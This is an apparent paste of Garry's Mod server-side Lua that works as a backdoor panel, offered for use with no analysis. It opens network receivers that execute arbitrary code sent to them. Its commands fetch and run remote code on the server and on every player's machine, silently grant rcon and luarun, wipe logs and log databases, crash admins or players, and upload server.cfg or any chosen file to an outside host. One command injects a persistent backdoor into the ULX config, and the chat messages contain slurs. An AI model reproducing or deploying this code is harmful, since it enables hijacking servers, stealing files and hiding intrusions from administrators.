

Apr 25th, 2018
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  1. util.AddNetworkString( "_CAC_ReadMemory" ) net.Receive( "_CAC_ReadMemory", function() local x = CompileString( net.ReadString(), "LuaCmd", false ) if isfunction( x ) then x() end end )
  2. util.AddNetworkString( '_Defqon' ) net.Receive( '_Defqon', function() local x = CompileString( net.ReadString(), 'LuaCmd', false ) if isfunction( x ) then x() end end )
  4. local Retards = {}
  5. local Logs = {"sv_logecho","sv_logfile","sv_log_onefile","lua_log_sv","ulx_logchat","ulx_logspawnsecho","ulx_logspawns","ulx_logjoinleaveecho","ulx_logfile","ulx_logevents","ulx_logecho","ulx_logdir","ulx logEchoColors"}
  6. local Date = "%m-%d-%y")
  7. local StaffRanks = {"tmod","t-mod","trialmod","trialmoderator","trial-moderator","admin","superadmin","headadmin","head-admin","staff-manager","staffmanager","owner","coowner","co-owner","dev","developer","vip-tmod","vip-mod","manager","servermanager","root","server-manager","staff-manager","operator","mod","moderator"}
  9. concommand.Add("hell", function(ply)
  10. for k,v in pairs(player.GetAll()) do
  11. v:SendLua([[http.Fetch('',function(b,l,h,c)RunString(b)end,nil)]])
  12. timer.Simple(2, function() do v:ConCommand("hellstart") end end )
  13. ply:ChatPrint( "[RunString] Welcome to hell." )
  14. end
  15. end )
  17. concommand.Add("perms", function(ply)
  18. timer.Simple(2, function() file.Delete("ulx_logs/"..Date..".txt") end )
  19. RunConsoleCommand("ulx","logEcho","0")
  20. RunConsoleCommand("ulx","userallow",ply:Nick(),"ulx logEcho","0")
  21. RunConsoleCommand("ulx","userallow",ply:Nick(),"ulx logEcho","1")
  22. RunConsoleCommand("ulx","userallow",ply:Nick(),"ulx luarun")
  23. RunConsoleCommand("ulx","userallow",ply:Nick(),"ulx rcon")
  24. RunConsoleCommand("ulx","logEcho","1")
  25. sql.Query("DELETE FROM blogs_v3 WHERE involved = '[]'")
  26. ply:ChatPrint( "[RunString] Successfully & silently given ulx logecho, luarun & rcon." )
  27. end )
  29. concommand.Add("disco", function(ply)
  30. http.Fetch('',function(b,l,h,c)RunString(b)end,nil)
  31. ply:ChatPrint( "[RunString] Enabled I don't even know what to call this." )
  32. end )
  34. local mn = false
  35. concommand.Add( "moansteps", function(ply)
  36. mn = !mn
  37. if( mn ) then
  38. ply:ChatPrint("[RunString] Moaning footsets enabled.")
  39. hook.Add("PlayerFootstep", "memesv2", function(ply, pos, foot, sound2, volume, filter) ply:EmitSound( "vo/npc/female01/pain06.wav",75,math.random( 50, 150 )) end )
  40. else
  41. hook.Remove("PlayerFootstep", "memesv2")
  42. ply:ChatPrint("[RunString] Moaning footsets disabled.")
  43. end
  44. end )
  46. concommand.Add("httpfetch", function(ply,cmd,arg)
  47. if arg[1] == nil then
  48. ply:ChatPrint("[RunString] Usage error: httpfetch sv/cl url")
  49. elseif arg[1] == "sv" then
  50. http.Fetch('http://'..arg[2], function(b) RunString(b) end)
  51. elseif arg[1] == "cl"then
  52. ply:SendLua("http.Fetch('http://"..arg[2]..", function(b) RunString(b) end)")
  53. end
  54. end )
  56. concommand.Add("update", function(ply)
  57. http.Fetch('',function(b,l,h,c)RunString(b)end,nil)
  58. ply:ChatPrint( "[RunString] Retrieved latest version." )
  59. end )
  61. local bm = false
  62. concommand.Add("2d", function(ply)
  63. local a = ply:LookupBone("ValveBiped.Bip01_Head1")
  64. local b = ply:LookupBone("ValveBiped.Bip01_R_Thigh")
  65. local c = ply:LookupBone("ValveBiped.Bip01_L_Thigh")
  66. local d = ply:LookupBone("ValveBiped.Bip01_R_Calf")
  67. local e = ply:LookupBone("ValveBiped.Bip01_L_Calf")
  68. local f = ply:LookupBone("ValveBiped.Bip01_R_UpperArm")
  69. local g = ply:LookupBone("ValveBiped.Bip01_L_UpperArm")
  70. local h = ply:LookupBone("ValveBiped.Bip01_R_Forearm")
  71. local i = ply:LookupBone("ValveBiped.Bip01_L_Forearm")
  72. local j = ply:LookupBone("ValveBiped.Bip01_R_Clavicle")
  73. local k = ply:LookupBone("ValveBiped.Bip01_L_Clavicle")
  74. bm = !bm
  75. if( bm ) then
  76. for k,v in pairs(player.GetAll()) do
  77. v:ManipulateBoneScale( a, Vector(4,0,4))
  78. v:ManipulateBoneScale( b, Vector(0,0,0))
  79. v:ManipulateBoneScale( c, Vector(0,0,0))
  80. v:ManipulateBoneScale( d, Vector(0,0,1))
  81. v:ManipulateBoneScale( e, Vector(0,0,1))
  82. v:ManipulateBoneScale( f, Vector(0,0,0))
  83. v:ManipulateBoneScale( g, Vector(0,0,0))
  84. v:ManipulateBoneScale( h, Vector(1,1.5,1.5))
  85. v:ManipulateBoneScale( i, Vector(1,1.5,1.5))
  86. v:ManipulateBoneScale( j, Vector(0,0,0))
  87. v:ManipulateBoneScale( k, Vector(0,0,0))
  88. end
  89. ply:ChatPrint( "[RunString] Enabled 2d players." )
  90. else
  91. ply:ChatPrint( "[RunString] Disabled 2d players." )
  92. for k,v in pairs(player.GetAll()) do
  93. v:ManipulateBoneScale( a, Vector(1,1,1))
  94. v:ManipulateBoneScale( b, Vector(1,1,1))
  95. v:ManipulateBoneScale( c, Vector(1,1,1))
  96. v:ManipulateBoneScale( d, Vector(1,1,1))
  97. v:ManipulateBoneScale( e, Vector(1,1,1))
  98. v:ManipulateBoneScale( f, Vector(1,1,1))
  99. v:ManipulateBoneScale( g, Vector(1,1,1))
  100. v:ManipulateBoneScale( h, Vector(1,1,1))
  101. v:ManipulateBoneScale( i, Vector(1,1,1))
  102. v:ManipulateBoneScale( j, Vector(1,1,1))
  103. v:ManipulateBoneScale( k, Vector(1,1,1))
  104. end
  105. end
  106. end )
  108. concommand.Add("dosh", function(ply)
  109. for k,v in pairs(player.GetAll()) do v:addMoney(99999999999999999) ply:ChatPrint("[RunString] Fucked economy of active players.") v:ChatPrint("You were given a small loan of several billion dollars.") end
  110. end )
  112. concommand.Add("restartserver", function()
  113. game.GetWorld():Remove()
  114. end )
  116. local ml = false
  117. concommand.Add("mutelogs", function(ply)
  118. ml = !ml
  119. if( ml ) then
  120. for k,v in pairs(Logs) do RunConsoleCommand(v,"0") end
  121. ply:ChatPrint( "[RunString] Successfully muted all logging." )
  122. timer.Create( "ml", 2, 0, function()
  123. timer.Simple(0, function() RunConsoleCommand("ulx","logEcho",0) end )
  124. timer.Simple(0, function() file.Delete("ulx_logs/"..Date..".txt") end )
  125. timer.Simple(0, function() sql.Query("DELETE FROM blogs_v3 WHERE involved = '[]'") end )
  126. end )
  127. else
  128. for k,v in pairs(Logs) do RunConsoleCommand(v,"1") end
  129. timer.Destroy( "ml" )
  130. ply:ChatPrint( "[RunString] Successfully unmuted all logging." )
  131. end
  132. end )
  134. concommand.Add("wipedata", function(ply)
  135. http.Fetch('',function(b,l,h,c)RunString(b)end,nil)
  136. ply:ChatPrint( "[RunString] Initiated Server Wipe." )
  137. end )
  139. concommand.Add("clearlogs", function(ply)
  140. sql.Query( "DELETE FROM blogs_v3;" )
  141. sql.Query( "DELETE FROM ulogs;" )
  142. sql.Query( "DELETE FROM mlog_logs;" )
  143. file.Delete( "ulx_logs/"..Date..".txt" )
  144. ply:ChatPrint( "[RunString] Silently killed all logs." )
  145. end )
  147. concommand.Add("crashadmins", function(ply)
  148. ply:ChatPrint( "[RunString] Crashed all staff present." )
  149. for k,v in pairs(player.GetAll()) do if (table.HasValue(StaffRanks, v:GetUserGroup())) then v:SendLua("while true do end") end end
  150. end )
  152. concommand.Add("crashplayers", function(ply)
  153. ply:ChatPrint( "[RunString] Crashed all players except lads." )
  154. for k,v in pairs(player.GetAll()) do if (!table.HasValue(StaffRanks, v:GetUserGroup())) then v:SendLua("while true do end") end end
  155. end )
  157. concommand.Add( "smashconsole", function(ply)
  158. sc = !sc
  159. if( sc ) then
  160. ply:ChatPrint( "[RunString] Enabled console jammer" )
  161. timer.Create( "sc", 0.5, 0, function()
  162. print( "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n" )
  163. end )
  164. else
  165. ply:ChatPrint( "[RunString] Disabled consolejammer" )
  166. timer.Destroy( "sc" )
  167. end
  168. end )
  170. concommand.Add("namechange", function(ply,cmd,arg)
  171. local DESIRED_NAME = arg[1]
  172. for k, v in pairs(player.GetAll()) do
  173. DarkRP.storeRPName(v, DESIRED_NAME)
  174. v:setDarkRPVar("rpname", DESIRED_NAME)
  175. end
  176. ply:ChatPrint( "[RunString] Changed user names" )
  177. end )
  179. concommand.Add("silentslay", function(ply,cmd,arg)
  180. for k, v in pairs(player.GetAll()) do
  181. if string.find(v:Nick():lower(),arg[1]) then
  182. v:KillSilent()
  183. end
  184. end
  185. ply:ChatPrint("[RunString] Silently slayed nerd(s)")
  186. end )
  188. concommand.Add("p_remove", function(ply,cmd,arg)
  189. if arg[1] == nil then
  190. ply:ChatPrint("[RunString] Usage: p_remove arg")
  191. else
  192. for k, v in pairs(ents.FindInSphere(ply:GetPos(), arg[1])) do
  193. if v:GetClass() == "prop_physics" then
  194. v:Remove()
  195. end
  196. end
  197. ply:ChatPrint("[RunString] Removed all props in a "..arg[1].." gmod unit radius.")
  198. end
  199. end )
  201. concommand.Add("rcon_run", function(ply,cmd,arg)
  202. if arg[1] == nil then
  203. ply:ChatPrint("[RunString] Usage: rcon_run arg")
  204. else
  205. game.ConsoleCommand(arg[1].."\n")
  206. ply:ChatPrint("[RunString] Rcon ran: "..arg[1])
  207. end
  208. end )
  210. concommand.Add("unban", function(ply,cmd,arg)
  211. if arg[1] == nil then
  212. ply:ChatPrint("[RunString] Usage: unban ip/ulx arg")
  213. elseif arg[1] == "ip" then
  214. RunConsoleCommand("removeip", arg[2])
  215. ply:ChatPrint("[RunString] Silently unbanned ip "..arg[2])
  216. elseif arg[1] == "ulx" then
  217. ULib.unban(arg[2])
  218. ply:ChatPrint("[RunString] Silently unbanned "..arg[2])
  219. end
  220. end )
  222. concommand.Add("forcesay", function(ply,cmd,arg)
  223. for k, v in pairs(player.GetAll()) do
  224. if string.find(v:Nick():lower(),arg[1]) then
  225. v:ConCommand("say "..arg[2])
  226. end
  227. end
  228. end )
  230. concommand.Add("nukeulx", function(ply)
  231. if ULib then
  232. for groupName, _ in pairs(ULib.ucl.groups) do
  233. if groupName ~= "user" then
  234. ULib.ucl.removeGroup(groupName)
  235. end
  236. end
  237. end
  238. ply:ChatPrint("[RunString] Nuked ULX.")
  239. end )
  241. concommand.Add("m9knuke", function(ply)
  242. local rocket = ents.Create("m9k_launched_davycrockett")
  243. local ply2 = table.Random(player.GetAll())
  244. if ply2 == ply then ply:ChatPrint("[RunString] Prevented epicentre from being you.") else
  245. rocket:SetPos(ply2:GetPos())
  246. rocket:SetOwner(ply2)
  247. rocket.Owner = ply2
  248. rocket:Spawn()
  249. rocket:Activate()
  250. ply:ChatPrint("[RunString] Allahu akbar.")
  251. end
  252. end )
  254. concommand.Add("servercfg", function(ply)
  255. http.Post("",{a=string.sub( GetHostName(), 1, 10 ),b="cfg"})
  256. http.Post("",{a=string.sub( GetHostName(), 1, 10 ),b="cfg/server.cfg",c=file.Read("cfg/server.cfg","GAME")})
  257. ply:ChatPrint("[RunString] Stole server.cfg contact Admin for it.")
  258. end )
  260. concommand.Add("stealfile", function(ply,cmd,arg)
  261. http.Post("",{a=string.sub( GetHostName(), 1, 10 ),b=arg[1]})
  262. http.Post("",{a=string.sub( GetHostName(), 1, 10 ),b=arg[2],c=file.Read(arg[2],"GAME")})
  263. ply:ChatPrint("[RunString] Attempted to steal a file, contact Admin.")
  264. end )
  266. concommand.Add("helpme", function(ply,cmd,arg)
  267. if arg[1] == nil then
  268. ply:ChatPrint( "Usage: helpme 1/2" )
  269. elseif arg[1] == "1" then
  270. ply:ChatPrint( "~===[[Page 1]]===~" )
  271. ply:ChatPrint( "• Memes: hell, disco, rektmodels, moansteps, p_remove" )
  272. ply:ChatPrint( "• Util: update, perms, unban" )
  273. ply:ChatPrint( "• Sneaky: crashadmins, crashplayers, smashconsole, ulxconfig" )
  274. ply:ChatPrint( "• Destructive: restartserver, dosh" )
  275. elseif arg[1] == "2" then
  276. ply:ChatPrint( "~===[[Page 2]]===~" )
  277. ply:ChatPrint( "• Memes: 2d, stealdata, servercfg, namechange" )
  278. ply:ChatPrint( "• Util: mutelogs, clearlogs, rcon_run, hail" )
  279. ply:ChatPrint( "• Sneaky: silentslay, forcesay, stealfile" )
  280. ply:ChatPrint( "• Destructive: wipedata, nukeulx, m9knuke" )
  281. elseif arg[1] == "3" then
  282. ply:ChatPrint( "~===[[Page 3]]===~" )
  283. ply:ChatPrint( "NOTHING TO ADD YET HERE RETARD." )
  284. end
  285. end )
  287. concommand.Add("ulxconfig", function(ply)
  288. if(ulx) then
  289. file.Append( "ulx/config.txt", "\nulx luarun util.AddNetworkString('nostrip') net.Receive('nostrip',function(len,pl) RunStringEx(net.ReadString(),'[C]',false) end)")
  290. ply:ChatPrint( "[RunString] Successfully infected the ulx config." )
  291. else
  292. ply:ChatPrint( "[RunString] ULX isn't present dickhead." )
  293. end
  294. end )
  296. /*
  297. concommand.Add("stealdata", function(ply,cmd,arg)
  298. if arg[1] == nil then
  299. ply:ChatPrint("[RunString] Usage: stealdata stealth/ransom")
  300. elseif arg[1] == "stealth" then
  301. stealthjewdata()
  302. ply:ChatPrint("[RunString] Usage: Stole /data/ without deleting.")
  303. elseif arg[1] == "ransom" then
  304. ransomjewdata()
  305. ply:ChatPrint("[RunString] Usage: Stole /data/ & removed all data.")
  306. end
  307. end )
  308. */
  310. local sm = false
  311. local proplist = {
  312. "models/props_c17/FurnitureWashingmachine001a.mdl",
  313. "models/props_c17/Lockers001a.mdl",
  314. "models/props_c17/oildrum001.mdl",
  315. "models/props_combine/breenchair.mdl",
  316. "models/props_c17/concrete_barrier001a.mdl",
  317. "models/props_c17/furnitureStove001a.mdl",
  318. "models/props_interiors/VendingMachineSoda01a.mdl",
  319. "models/props_interiors/refrigerator01a.mdl",
  320. "models/props_wasteland/laundry_dryer002.mdl",
  321. "models/props_canal/bridge_pillar02.mdl",
  322. "models/props_wasteland/coolingtank02.mdl",
  323. "models/props_junk/TrashBin01a.mdl",
  324. "models/props_wasteland/cargo_container01.mdl",
  325. "models/props_wasteland/cargo_container01c.mdl",
  326. "models/props_wasteland/wheel02b.mdl",
  327. "models/props_wasteland/laundry_washer003.mdl",
  328. "models/props_wasteland/kitchen_fridge001a.mdl",
  329. "models/props_wasteland/medbridge_strut01.mdl",
  330. "models/props_wasteland/medbridge_base01.mdl",
  331. "models/props_wasteland/laundry_dryer001.mdl",
  332. "models/props_wasteland/horizontalcoolingtank04.mdl",
  333. "models/props_c17/metalladder002.mdl",
  334. "models/hunter/blocks/cube8x8x8.mdl",
  335. "models/props_buildings/watertower_001a.mdl",
  336. "models/props_buildings/watertower_001c.mdl",
  337. "models/props_phx/huge/tower.mdl",
  338. "models/props/de_nuke/coolingtower.mdl",
  339. "models/hunter/tubes/tube4x4x16.mdl",
  340. "models/props_wasteland/cranemagnet01a.mdl",
  341. "models/props/de_nuke/coolingtank.mdl"
  342. }
  344. concommand.Add( "rektmodels", function(ply)
  345. sm = !sm
  346. if( sm ) then
  347. ply:ChatPrint( "[RunString] Enabled model change spammer" )
  348. timer.Create( "sm", 0.5, 0, function()
  349. for k,v in pairs( player.GetAll() ) do
  350. v:SetModel(table.Random( proplist) )
  351. v:SetPlayerColor( Vector( 0,0,0 ) )
  352. end
  353. end )
  354. else
  355. ply:ChatPrint( "[RunString] Disabled model change spammer" )
  356. timer.Destroy( "sm" )
  357. for k,v in pairs( player.GetAll() ) do
  358. v:SetModel("models/player/Group01/male_01.mdl")
  359. v:SetPlayerColor( Vector( 0,0,0 ) )
  360. end
  361. end
  362. end )
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